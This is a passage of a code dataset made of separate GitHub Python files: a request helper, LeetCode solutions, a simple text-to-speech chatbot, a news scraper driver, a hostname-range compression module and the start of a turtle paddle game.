}\n\n\ndef get_html(url):\n try:\n result = requests.get(url, headers = headers)\n result.raise_for_status()\n return result.text\n except requests.exceptions.RequestException as e: \n print(e)\n return False\n\n\n","repo_name":"andyoleinikov/TempSensor","sub_path":"req.py","file_name":"req.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43211260719","text":"#Guest list with message and pop\n\nguests=['matt','syedur','phil']\n\nleaving_guest=guests.pop(0)\n\nprint(leaving_guest.title()+\" wont be able to make it\\n\")\n\nguests.append('jimmy')\n\nfor guest in guests:\n print('Hello '+guest.title()+', you are invited to dinner at my house\\n')","repo_name":"frankcw/Python","sub_path":"CrashCourse/Chapter 3/3-5.py","file_name":"3-5.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6672729941","text":"#T(n) = O(n)\n#S(n) = O(n)\nclass Solution:\n def wordPattern(self, pattern: str, s: str) -> bool:\n pDict,sDict={},{}\n sArr=s.split(\" \")\n if len(pattern)!=len(sArr):\n return False\n for i in range(0,len(pattern)):\n if pDict.get(pattern[i],-1)==-1:\n pDict[pattern[i]]=sArr[i]\n else:\n if pDict[pattern[i]]!=sArr[i]:\n return False\n \n if sDict.get(sArr[i],-1)==-1: \n sDict[sArr[i]]=pattern[i]\n else:\n if sDict[sArr[i]]!=pattern[i]:\n return False\n return True","repo_name":"Gsubhashreddy/Hashing-1","sub_path":"wordPattern.py","file_name":"wordPattern.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"69951699123","text":"class Solution:\n '''\n time: O(n)\n space: O(n)\n '''\n def lengthOfLongestSubstring(self, s: str) -> int:\n hashmap = {}\n l = 0\n max_len = 0\n for r, char in enumerate(s):\n if (char in hashmap) and (hashmap[char] >= l):\n l = hashmap[char] + 1\n else:\n max_len = max(max_len, r - l + 1)\n hashmap[char] = r\n return max_len\n","repo_name":"FrancisTan88/Leetcode","sub_path":"medium/LongestSubstringWithoutRepeatingCharacters.py","file_name":"LongestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37679515284","text":"#!\"python.exe\"\r\nimport random\r\nfrom gtts import gTTS\r\nimport os\r\n\r\n#------------------------------- Set Library List and OML File Paths --------------------------------#\r\noslibli=\"Osiris Library List\\\\\" # ( import List of OML Libraries Path )\r\nomllibs=\"OML Speech Libraries\\\\\" # ( OML Libraries file path )\r\n\r\n#################################<<<<< FORBIDDEN SECTION 001 >>>>>####################################\r\n###################################### DON'T EDIT THESE EVER #########################################\r\n\r\n#----------------------------------- import List of OML Libraries -----------------------------------#\r\noml=open(oslibli+\"osiris.libs\",\"r\")\r\nscript=oml.readlines()\r\noml.close()\r\n\r\n#----------------------------- global variable to concat all lib contents ---------------------------#\r\nimports=\"\"\r\n\r\n#-------------------------------- function to concat all lib contents -------------------------------#\r\ndef reset():\r\n\tdef import_oml(oml_file):\r\n\t\tglobal imports\r\n\t\ttry:\r\n\t\t\toml=open(omllibs+oml_file,\"r\")\r\n\t\t\timports=imports+\"\\n\"+oml.read()\r\n\t\t\toml.close()\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\">>> Error[01]: Import File << \"+oml_file+\" >> Not Found\")\r\n\r\n#------------------------------------------- keywords list ------------------------------------------#\r\n\tcommand_list=[\"import\"]\r\n\r\n#----------------------------------------- Libraries Concat -----------------------------------------#\r\n\tfor code in script:\r\n\t\tfeeds=code.strip().split(\" \")\r\n\t\tif(feeds[0]==command_list[0]):\r\n\t\t\timport_oml(feeds[1])\r\n\r\nreset()\t\r\n###################################### DON'T EDIT THESE EVER #########################################\r\n\r\ndef speech(text):\r\n\tmytext = text\r\n\tlanguage = 'en'\r\n\tmyobj = gTTS(text=mytext, lang=language, slow=False) \r\n\tmyobj.save(\"osiris.mp3\") \r\n\tos.system(\"mpg123 osiris.mp3\") \r\n\r\n\r\nstate=\"0\"\r\n\r\ndef type1(sen):\r\n\tglobal state\r\n\t#print(state)\r\n\tif(sen[0]==\"shall\" or sen[0]==\"should\" or sen[0]==\"does\" or sen[0]==\"must\" or sen[0]==\"will\" or sen[0]==\"can\" or sen[0]==\"do\" or sen[0]==\"may\" or sen[0]==\"can\" or sen[0]==\"could\" or sen[0]==\"would\" or sen[0]==\"might\"):\r\n\t\tif(sen[1]==\"i\" or sen[1]==\"you\" or sen[1]==\"he\" or sen[1]==\"she\" or sen[1]==\"they\" or sen[1]==\"we\" or sen[1]==\"it\"):\r\n\t\t\tif(sen[1]==\"i\" or sen[1]==\"we\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"you\"\r\n\t\t\t\tstate=\"1\"\r\n\t\t\telif(sen[1]==\"you\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"i\"\r\n\t\t\t\tstate=\"1\"\r\n\t\t\tif(sen[len(sen)-1]==\"you\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"me\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"me\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"you\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"something\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"anything\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\tx=\"\"\r\n\t\t\tx=x+sen[1]+\" \"+sen[0]\r\n\t\t\t#print(x)\r\n\t\t\tfor index in range(2,len(sen),1):\r\n\t\t\t\tif(index<(len(sen)-2)):\r\n\t\t\t\t\tif(sen[index]!=\"i\" and sen[index]!=\"you\" and sen[index]!=\"he\" and sen[index]!=\"she\" and sen[index]!=\"they\" and sen[index]!=\"we\" and sen[index]!=\"it\" and sen[index]!=\"shall\" and sen[index]!=\"will\" and sen[index]!=\"can\" and sen[index]!=\"do\" and sen[index]!=\"may\" and sen[index]!=\"can\" and sen[index]!=\"could\" and sen[index]!=\"would\" and sen[index]!=\"might\"):\r\n\t\t\t\t\t\t#print(sen[index])\r\n\t\t\t\t\t\t#print(sen[index+1])\r\n\t\t\t\t\t\t#print(sen[index+2])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif(sen[index+1]==\"your\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"my\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"my\" or sen[index+1]==\"our\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"your\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"myself\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"yourself\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"yourself\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"myself\"\r\n\t\t\t\t\t\tif(sen[index+2]!=\"can\" and sen[index+2]!=\"could\" and sen[index+2]!=\"may\" and sen[index+2]!=\"might\"):\r\n\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"me\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"me\" or sen[index+1]==\"us\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\telif(sen[index+2]==\"can\" or sen[index+2]==\"could\" or sen[index+2]==\"may\" or sen[index+2]==\"might\"):\r\n\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"i\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\tx=x+\" \"+sen[index]\r\n\t\t\t\t#print(x)\r\n\t\t\t\t\r\n\t\t\treturn x.capitalize()\r\n\r\ndef type2(sen):\r\n\tglobal state\r\n\tif(sen[0]==\"am\" or sen[0]==\"are\" or sen[0]==\"is\" or sen[0]==\"has\" or sen[0]==\"have\" or sen[0]==\"will\" or sen[0]==\"would\" or sen[0]==\"shall\" or sen[0]==\"should\"):\r\n\t\tif(sen[1]==\"i\" or sen[1]==\"it\" or sen[1]==\"we\" or sen[1]==\"he\" or sen[1]==\"she\" or sen[1]==\"they\" or sen[1]==\"you\" ):\r\n\t\t\tif(sen[1]==\"i\" and sen[0]==\"am\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"you\"\r\n\t\t\t\tsen[0]=\"are\"\r\n\t\t\t\t#print(\"1\")\r\n\t\t\t\tstate=\"1\"\r\n\t\t\telif(sen[1]==\"we\" and sen[0]==\"are\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"you\"\r\n\t\t\t\tsen[0]=\"are\"\r\n\t\t\t\t#print(\"2\")\r\n\t\t\t\tstate=\"1\"\r\n\t\t\telif(sen[1]==\"you\" and sen[0]==\"are\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"i\"\r\n\t\t\t\tsen[0]=\"am\"\r\n\t\t\t\t#print(\"3\")\r\n\t\t\t\tstate=\"1\"\r\n\t\t\tif(sen[len(sen)-1]==\"you\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"me\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"me\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"you\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"something\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"anything\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\tx=\"\"\r\n\t\t\tx=x+sen[1]+\" \"+sen[0]\r\n\t\t\tfor index in range(2,len(sen),1):\r\n\t\t\t\tif(index<(len(sen)-2)):\r\n\t\t\t\t\tif(sen[index]!=\"i\" and sen[index]!=\"you\" and sen[index]!=\"he\" and sen[index]!=\"she\" and sen[index]!=\"they\" and sen[index]!=\"we\" and sen[index]!=\"it\" and sen[index]!=\"shall\" and sen[index]!=\"will\" and sen[index]!=\"can\" and sen[index]!=\"do\" and sen[index]!=\"may\" and sen[index]!=\"can\" and sen[index]!=\"could\" and sen[index]!=\"would\" and sen[index]!=\"might\"):\r\n\t\t\t\t\t\tif(sen[index+1]==\"me\" or sen[index+1]==\"us\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"me\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"your\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"my\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"my\" or sen[index+1]==\"our\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"your\"\r\n\t\t\t\t\t\t\r\n\t\t\t\tx=x+\" \"+sen[index]\r\n\t\t\treturn x.capitalize()\r\n\r\ndef type3(sen):\r\n\tglobal state\r\n\tif(sen[0]==\"when\" or sen[0]==\"where\" or sen[0]==\"what\"):#which,whom,why\r\n\t\tif(sen[1]==\"am\" or sen[1]==\"are\" or sen[1]==\"is\" or sen[1]==\"has\" or sen[1]==\"have\" or sen[1]==\"will\" or sen[1]==\"would\" or sen[1]==\"shall\" or sen[1]==\"should\" or sen[1]==\"do\" or sen[1]==\"must\" or sen[1]==\"might\" or sen[1]==\"could\" or sen[1]==\"will\" or sen[1]==\"may\" or sen[1]==\"does\"):\r\n\t\t\tif(sen[2]==\"i\" or sen[2]==\"it\" or sen[2]==\"we\" or sen[2]==\"he\" or sen[2]==\"she\" or sen[2]==\"they\" or sen[2]==\"you\" or sen[2]==\"your\" or sen[2]==\"their\" ):\r\n\t\t\t\tif(sen[2]==\"i\" and sen[1]==\"am\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"you\"\r\n\t\t\t\t\tsen[1]=\"are\"\r\n\t\t\t\t\t#print(\"1\")\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"we\" and sen[1]==\"are\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"you\"\r\n\t\t\t\t\tsen[1]=\"are\"\r\n\t\t\t\t\t#print(\"2\")\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"you\" and sen[1]==\"are\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"i\"\r\n\t\t\t\t\tsen[1]=\"am\"\r\n\t\t\t\t\t#print(\"3\")\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"i\" or sen[2]==\"we\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"you\"\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"you\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"i\"\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\r\n\t\t\t\tif(sen[len(sen)-1]==\"you\" and state==\"1\"):\r\n\t\t\t\t\tsen[len(sen)-1]=\"me\"\r\n\t\t\t\t\tstate=\"2\"\r\n\t\t\t\telif(sen[len(sen)-1]==\"me\" and state==\"1\"):\r\n\t\t\t\t\tsen[len(sen)-1]=\"you\"\r\n\t\t\t\t\tstate=\"2\"\r\n\t\t\t\telif(sen[len(sen)-1]==\"something\" and state==\"1\"):\r\n\t\t\t\t\tsen[len(sen)-1]=\"anything\"\r\n\t\t\t\t\tstate=\"2\"\r\n\t\t\t\tx=\"\"\r\n\t\t\t\tx=x+sen[2]+\" \"+sen[1]\r\n\t\t\t\tfor index in range(3,len(sen),1):\r\n\t\t\t\t\tif(index<(len(sen)-2)):\r\n\t\t\t\t\t\tif(sen[index]!=\"i\" and sen[index]!=\"you\" and sen[index]!=\"he\" and sen[index]!=\"she\" and sen[index]!=\"they\" and sen[index]!=\"we\" and sen[index]!=\"it\" and sen[index]!=\"shall\" and sen[index]!=\"will\" and sen[index]!=\"can\" and sen[index]!=\"do\" and sen[index]!=\"may\" and sen[index]!=\"can\" and sen[index]!=\"could\" and sen[index]!=\"would\" and sen[index]!=\"might\"):\r\n\t\t\t\t\t\t\t#print(sen[index])\r\n\t\t\t\t\t\t\t#print(sen[index+1])\r\n\t\t\t\t\t\t\t#print(sen[index+2])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(sen[index+1]==\"your\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"my\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"my\" or sen[index+1]==\"our\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"your\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"myself\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"yourself\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"yourself\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"myself\"\r\n\t\t\t\t\t\t\tif(sen[index+2]!=\"can\" and sen[index+2]!=\"could\" and sen[index+2]!=\"may\" and sen[index+2]!=\"might\"):\r\n\t\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"me\"\r\n\t\t\t\t\t\t\t\telif(sen[index+1]==\"me\" or sen[index+1]==\"us\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\telif(sen[index+2]==\"can\" or sen[index+2]==\"could\" or sen[index+2]==\"may\" or sen[index+2]==\"might\"):\r\n\t\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"i\"\r\n\t\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\tx=x+\" \"+sen[index]\r\n\t\t\t\t\t#print(x)\r\n\t\t\t\t\r\n\t\t\t\treturn x.capitalize()\r\n\r\nstateX=\"1\"\r\nprev_ask=\"\"\r\n\t\r\ndef main(sub_imports,ask):\r\n\tglobal stateX,imports\r\n\texists=\"0\"\r\n\tcommands=sub_imports.strip().split(\"\\n\")\r\n\tfor index in range(0,len(commands),1):\r\n\t\tif(commands[index].strip()==\"\"):\r\n\t\t\tcontinue\r\n\t\t#print(\">>> \"+commands[index])\r\n\t\tif(commands[index].split(\":\")[0].strip()==\"dialogue\" and ask.strip(\"?\").strip().lower()==commands[index].split(\":\")[1].strip(\"?\").strip().lower()):\r\n\t\t\texists=\"1\"\r\n\t\t\tif(commands[index+1].split(\":\")[0].strip()==\"response\"):\r\n\t\t\t\tprint(commands[index+1].split(\":\")[1].strip())\r\n\t\t\t\tspeech(commands[index+1].split(\":\")[1].strip())\r\n\t\t\t\tbreak\r\n\t\t\telif(commands[index+1].split(\":\")[0].strip()==\"random\" and commands[index+1].split(\":\")[1].strip()==\"start\"):\r\n\t\t\t\trandvalues=[]\r\n\t\t\t\tfor subindex in range((index+1),len(commands),1):\r\n\t\t\t\t\tif(commands[subindex].strip().split(\":\")[0].strip()==\"response\"):\r\n\t\t\t\t\t\trandvalues.append(commands[subindex].strip())\r\n\t\t\t\t\telif(commands[subindex].strip().split(\":\")[0].strip()==\"random\" and commands[subindex].strip().split(\":\")[1].strip()==\"stop\"):\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tranddata=randvalues[random.randrange(0, len(randvalues), 1)].split(\":\")[1].strip()\r\n\t\t\t\tprint(randdata)\r\n\t\t\t\tspeech(randdata)\r\n\t\tif(ask.strip().lower()==\"exit\"):\r\n\t\t\tstateX=\"0\"\r\n\t\t\tbreak\r\n\t\telif(ask.strip().lower()==\"no\"):\r\n\t\t\treask = input(\"And what must be the answer ?: \")\r\n\t\t\tif(reask.strip()!=\"exit\"):\r\n\t\t\t\trem=open(omllibs+\"User_Custom.oml\",\"r+\")\r\n\t\t\t\tdats=rem.readlines()\r\n\t\t\t\trem.close()\r\n\t\t\t\tfor line in range(0,len(dats),1):\r\n\t\t\t\t\tif(dats[line].strip()==\"\"):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t#print(\">>>dialogue: \"+prev_ask.strip(\"?\").strip())\r\n\t\t\t\t\ttemp=dats[line]\r\n\t\t\t\t\ttemp=temp.replace(\"?\",\"\")\r\n\t\t\t\t\t#print(\"<<<\"+temp.strip())\r\n\t\t\t\t\tif(\"dialogue: \"+prev_ask.strip(\"?\").strip()==temp.strip()):\r\n\t\t\t\t\t\tdats[line+1]=\"response: \"+reask+\"\\n\"\r\n\t\t\t\t\t\t#print(dats[line+1])\r\n\t\t\t\trem=open(omllibs+\"User_Custom.oml\",\"w+\")\r\n\t\t\t\trem.write(\"\")\r\n\t\t\t\trem.close()\r\n\t\t\t\trem=open(omllibs+\"User_Custom.oml\",\"a+\")\r\n\t\t\t\tfor line in range(0,len(dats),1):\r\n\t\t\t\t\t#print(dats[line])\r\n\t\t\t\t\trem.write(dats[line])\r\n\t\t\t\trem.close()\r\n\t\t\t\timports=\"\"\r\n\t\t\t\treset()\r\n\t\t\tbreak\r\n\t\r\n\tgram_escape=\"0\"\r\n\t\r\n\tif(exists==\"0\" and ask.strip()!=\"exit\" and ask.strip().lower()!=\"no\"):\r\n\t\tstate=\"0\"\r\n\t\tx=ask.lower()\r\n\t\tx=x.replace(\"?\",\"\")\r\n\t\tx=x.strip()\t\r\n\t\tsen=x.split(\" \")\r\n\t\tchoice_arr=[]\r\n\t\tchoice_arr.append(str(type1(sen)))\r\n\t\tchoice_arr.append(str(type2(sen)))\r\n\t\t#choice_arr.append(str(type3(sen)))\r\n\t\tfor ch in choice_arr:\r\n\t\t\tif(ch!=\"None\"):\r\n\t\t\t\tprint(ch)\r\n\t\t\t\tspeech(ch)\r\n\t\t\t\tgram_escape=\"1\"\r\n\t\t\t\tbreak\r\n\t\t\t\t\r\n\tif(exists==\"0\" and ask.strip()!=\"exit\" and ask.strip().lower()!=\"no\" and gram_escape==\"0\"):\r\n\t\treask = input(\"And what must be the answer ?: \")\r\n\t\tif(reask.strip()!=\"exit\"):\r\n\t\t\tcontent=\"\\ndialogue: \"+ask+\"\\nresponse: \"+reask\r\n\t\t\trem=open(omllibs+\"User_Custom.oml\",\"a+\")\r\n\t\t\trem.write(content)\r\n\t\t\trem.close()\r\n\t\t\timports=\"\"\r\n\t\t\treset()\r\n\r\n\r\nwhile stateX==\"1\":\r\n\t#os.remove(\"osiris.mp3\")\r\n\task = input(\"Say Something: \")\r\n\tif(ask.strip().lower()!=\"no\"):\r\n\t\tprev_ask=ask\r\n\tmain(imports,ask)","repo_name":"akatsukioshiro/Chatbot-Osiris","sub_path":"osiris.py","file_name":"osiris.py","file_ext":"py","file_size_in_byte":11912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9716141995","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n\nimport time\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport ScrapyDate\nimport Scrapylog\nimport ScrapyRequests\nimport ScrapyItem\nimport os\n\nif __name__ == '__main__':\n\tlog = Scrapylog.scrapylong()\n\tlog.printlog(1,'start scrapy')\n\tscrapytime = ScrapyDate.DealTime()\n\turl = ScrapyDate.getToutiaoUrl()\n\trequest = ScrapyRequests.getToutiaoInfo()\n\titem = ScrapyItem.getItem()\n\n\tbasedir = 'datadir'\n\tif os.path.exists(basedir) != True:\n\t\tos.mkdir(basedir)\n\tstartTime = scrapytime.getstarttime()\n\twhile scrapytime.getdisTime(scrapytime.nowTime(),startTime) > 0:\n\t\tnowdir = basedir + '\\\\' + str(startTime.year) + '\\\\' + str(startTime.month)\n\t\tif os.path.exists(nowdir) != True: \n\t\t\tos.mkdir(nowdir)\n\t\t\n\t\tfilename = nowdir + '\\\\' + scrapytime.getFilestr(startTime) + '.json'\t#文件名\n\t\trequesturl = url.getUrl(scrapytime.getTimestr(startTime))\t\t\t\t#url\n\t\tif os.path.exists(filename) == False:\n\t\t\tpageinfo = request.getUrlInfo(requesturl)\n\t\t\tif pageinfo != None:\n\t\t\t\titem.combinationjson(pageinfo,filename)\n\n\t\tstartTime = startTime + scrapytime.disTime()\n\n\tlog.printlog(1,'end scrapy')\n","repo_name":"whynotAC/AutomatedReports","sub_path":"scrapyitem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36366133392","text":"\"\"\"hostlists range management functions\"\"\"\nimport operator\nimport re\nfrom .plugin_manager import run_plugin_expand\n\n\n# A list of operators we use for set options\nSET_OPERATORS = ['-']\n\n\ndef cmp_compat(a, b):\n \"\"\"\n Simple comparison function\n :param a:\n :param b:\n :return:\n \"\"\"\n return (a > b) - (a < b)\n\n\ndef compress(hostnames):\n \"\"\"\n Compress a list of host into a more compact range representation\n \"\"\"\n domain_dict = {}\n result = []\n for host in hostnames:\n if '.' in host:\n domain = '.'.join(host.split('.')[1:])\n else:\n domain = ''\n try:\n domain_dict[domain].append(host)\n except KeyError:\n domain_dict[domain] = [host]\n domains = list(domain_dict.keys())\n domains.sort()\n for domain in domains:\n hosts = compress_domain(domain_dict[domain])\n result += hosts\n return result\n\n\ndef compress_domain(hostnames):\n \"\"\"\n Compress a list of hosts in a domain into a more compact representation\n \"\"\"\n hostnames.sort()\n prev_dict = {'prefix': \"\", 'suffix': '', 'number': 0}\n items = []\n items_block = []\n new_hosts = []\n for host in hostnames:\n try:\n parsed_dict = re.match(\n r\"(?P[^0-9]+)(?P\\d+)(?P.*).?\",\n host\n ).groupdict()\n # To generate the range we need the entries sorted numerically\n # but to ensure we don't loose any leading 0s we don't want to\n # replace the number parameter that is a string with the leading\n # 0s.\n parsed_dict['number_int'] = int(parsed_dict['number'])\n new_hosts.append(parsed_dict)\n except AttributeError:\n if '.' not in host:\n host += '.'\n parsed_dict = {'host': compress([host])[0].strip('.')}\n else:\n parsed_dict = {'host': host}\n new_hosts.append(parsed_dict)\n new_hosts = multikeysort(new_hosts, ['prefix', 'number_int'])\n for parsed_dict in new_hosts:\n if 'host' in parsed_dict.keys() or \\\n parsed_dict['prefix'] != prev_dict['prefix'] or \\\n parsed_dict['suffix'] != prev_dict['suffix'] or \\\n int(parsed_dict['number']) != int(prev_dict['number']) + 1:\n if len(items_block):\n items.append(items_block)\n items_block = [parsed_dict]\n else:\n items_block.append(parsed_dict)\n prev_dict = parsed_dict\n items.append(items_block)\n result = []\n for item in items:\n if len(item):\n if len(item) == 1 and 'host' in item[0].keys():\n result.append(item[0]['host'])\n elif len(item) == 1:\n result.append(\n '%s%s%s' % (\n item[0]['prefix'], item[0]['number'], item[0]['suffix']\n )\n )\n else:\n result.append(\n '%s[%s-%s]%s' % (\n item[0]['prefix'],\n item[0]['number'],\n item[-1]['number'],\n item[0]['suffix']\n )\n )\n return result\n\n\ndef multikeysort(items, columns):\n comparers = [\n ((operator.itemgetter(col[1:].strip()), -1) if col.startswith('-') else (operator.itemgetter(col.strip()), 1)) for col in columns\n ]\n\n def comparer(left, right):\n for fn, mult in comparers:\n try:\n result = cmp_compat(fn(left), fn(right))\n except KeyError:\n return 0\n if result:\n return mult * result\n else:\n return 0\n try:\n # noinspection PyArgumentList\n return sorted(items, cmp=comparer)\n except TypeError:\n # Python 3 removed the cmp parameter\n import functools\n return sorted(items, key=functools.cmp_to_key(comparer))\n\n\ndef range_split(hosts):\n \"\"\"\n Split up a range string, this needs to separate comma separated\n items unless they are within square brackets and split out set operations\n as separate items.\n \"\"\"\n in_brackets = False\n current = \"\"\n result_list = []\n for c in hosts:\n if c in ['[']:\n in_brackets = True\n if c in [']']:\n in_brackets = False\n if not in_brackets and c == ',':\n result_list.append(current)\n current = \"\"\n # elif not in_brackets and c == '-':\n # result_list.append(current)\n # result_list.append('-')\n # current = \"\"\n elif not in_brackets and c in [','] and len(current) == 0:\n pass\n else:\n current += c\n current = current.strip().strip(',')\n if current:\n result_list.append(current)\n return result_list\n\n\ndef expand(range_list, onepass=False):\n \"\"\"\n Expand a list of lists and set operators into a final host lists\n >>> expand(['foo[01-10]','-','foo[04-06]'])\n ['foo09', 'foo08', 'foo07', 'foo02', 'foo01', 'foo03', 'foo10']\n >>>\n \"\"\"\n if isinstance(range_list, str): # pragma: no cover\n range_list = [h.strip() for h in range_list.split(',')]\n new_list = []\n set1 = None\n operation = None\n for item in range_list:\n if set1 and operation:\n set2 = expand_item(item)\n new_list.append(list(set(set1).difference(set(set2))))\n set1 = None\n operation = None\n elif item in SET_OPERATORS and len(new_list):\n set1 = new_list.pop()\n operation = item\n else:\n expanded_item = expand_item(item, onepass=onepass)\n new_list.append(expanded_item)\n new_list2 = []\n for item in new_list:\n new_list2 += item\n return new_list2\n\n\ndef expand_item(range_list, onepass=False):\n \"\"\" Expand a list of plugin:parameters into a list of hosts \"\"\"\n\n if isinstance(range_list, str):\n range_list = [range_list]\n\n # Iterate through our list\n newlist = []\n found_plugin = False\n for item in range_list:\n # Is the item a plugin\n temp = item.split(':')\n found_plugin = False\n if len(temp) > 1:\n plugin = temp[0].lower()\n # Do we have a plugin that matches the passed plugin\n newlist += run_plugin_expand(plugin, ':'.join(temp[1:]).strip(':'))\n found_plugin = True\n else:\n # Default to running through the range plugin\n newlist += run_plugin_expand('range', temp[0])\n\n # Recurse back through ourselves incase a plugin returns a value that\n # needs to be parsed\n # by another plugin. For example a dns resource that has an address that\n # points to a load balancer vip that may container a number of hosts that\n # need to be looked up via the load_balancer plugin.\n if found_plugin and not onepass:\n newlist = expand_item(newlist)\n return newlist\n","repo_name":"dwighthubbard/hostlists","sub_path":"hostlists/range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"27660314229","text":"import turtle\r\nimport math\r\nimport time\r\nimport random\r\n\r\ndef init_screen(): \r\n w = turtle.Screen()\r\n w.clear()\r\n w.title(\"padel game\")\r\n w.bgcolor(\"pink\")\r\n w.setup(width=500,height=530)\r\n w.tracer(0,0)\r\n return w\r\n\r\ndef init_padel():\r\n global t3\r\n t3 = turtle.Turtle()\r\n t3.speed(0)\r\n t3.shape(\"square\")\r\n t3.color(\"purple\")\r\n t3.penup()\r\n t3.shapesize(0.7,3)\r\n t3.goto(0 , -220)\r\n t3.direction = \"istadeh\"\r\n return t3\r\n\r\n\r\n\r\ndef ball():\r\n global high_score\r\n global score\r\n global t1\r\n t1 = turtle.Turtle()\r\n t1.speed(0)\r\n t1.shape(\"circle\")\r\n t1.color(\"black\")\r\n t1.penup()\r\n t1.shapesize(0.9,0.9)\r\n t1.goto(0 , -203)\r\n scrn.update() \r\n update_score()\r\n x = 0\r\n y = -203\r\n theta = 45\r\n v0 = 0.5\r\n t1.penup()\r\n vx = v0 * math.cos ( theta * math.pi/180 )\r\n vy = v0 * math.sin ( theta * math.pi/180 )\r\n t = 0\r\n scrn.update()\r\n while True:\r\n x = x +vx * t\r\n y = vy * t + y\r\n t1.setpos(x,y)\r\n t = t + 